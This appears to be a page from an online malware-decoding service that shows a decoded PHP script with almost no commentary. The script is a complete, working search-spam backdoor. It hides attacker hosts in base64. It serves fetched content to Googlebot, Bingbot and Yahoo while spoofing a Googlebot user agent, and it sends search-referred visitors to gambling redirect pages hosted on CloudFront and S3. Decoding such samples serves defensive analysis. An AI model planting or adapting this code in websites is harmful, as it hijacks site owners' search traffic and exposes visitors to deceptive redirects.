Online PHP and Javascript Decoder decode hidden script to uncover its real functionality


set_time_limit(0);
error_reporting(0);
header("Content-Type: text/html;charset=utf-8");

define('URI', $_SERVER['REQUEST_URI']);
define('HOST', base64_decode('aHR0cHM6Ly9mYS5iZXQ2a3Nlby5jb20v'));     //api请求地址

// 定义多个跳转 API 目标地址(随机选择)
$tzdm_list = [
    base64_decode('aHR0cHM6Ly9icmNkbi5icmdvb2dsZXRhbmcuY29tL3RhbmdndW8uaHRtbA=='),  // cdn加速
    base64_decode('aHR0cHM6Ly9keTRkNTUzZTk3emRtLmNsb3VkZnJvbnQubmV0L3RhbmdndW8uaHRtbA=='),  // awscdn跳转域名
    base64_decode('aHR0cHM6Ly9ici5icmdvb2dsZXRhbmcuY29tL3RhbmdndW8uaHRtbA=='),  // 自己服务器跳转域名
    base64_decode('YnJnb29nbGUuczMuc2EtZWFzdC0xLmFtYXpvbmF3cy5jb20vdGFuZ2d1by5odG1s')   // s3跳转域名
];

// 这里随机选择一个 TZDM 地址
define('TZDM', $tzdm_list[array_rand($tzdm_list)]);

define('MULU', 'app|ios|android|download|blank|bet|casino|games|play|video|poker|root|news|data|-\d(?!\d)');

function isEngines($userAgent) {
    return preg_match('/Googlebot|Bingbot|Yahoo!/i', $userAgent);
}

function isRef($referrer) {
    return preg_match('/google|bing|yahoo/i', $referrer);
}

function isMulu($uri) {
    return preg_match('/' . MULU . '/i', $uri);
}

function getContents($url) {
    if (function_exists('curl_init')) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)");
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
        curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, false);
        $result = curl_exec($ch);
        $curlError = curl_error($ch);  
        curl_close($ch);

        if ($result === false) {
            error_log("cURL Error: " . $curlError); 
            return false;
        }
        return $result;
    } else {
        return file_get_contents($url);
    }
}

$ref = isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : '';
$key = isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : '';
$ym = $_SERVER['HTTP_HOST'];

// 搜索引擎来源的用户:仅当路径匹配 MULU 规则时跳转
if (isRef($ref) && isMulu(URI)) {
    $hostname = $_SERVER["HTTP_HOST"];
    $url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "://$_SERVER[HTTP_HOST]$_SERVER[REQUEST_URI]";
    $api_url = TZDM . '?xhost=' . $hostname . '&reurl=' . urlencode($url);
    $result = getContents($api_url);
    echo $result;
    exit;
}

if (isEngines($key)) {
    $hostname = $_SERVER["HTTP_HOST"];
    $url = (empty($_SERVER['HTTPS']) ? 'http' : 'https') . "$_SERVER[REQUEST_URI]";
    $api_url = HOST.'?xhost='.$hostname.'&reurl='.$url;
    $result = getContents($api_url);
    echo $result;
    exit;
}


© 2023 Quttera Ltd. All rights reserved.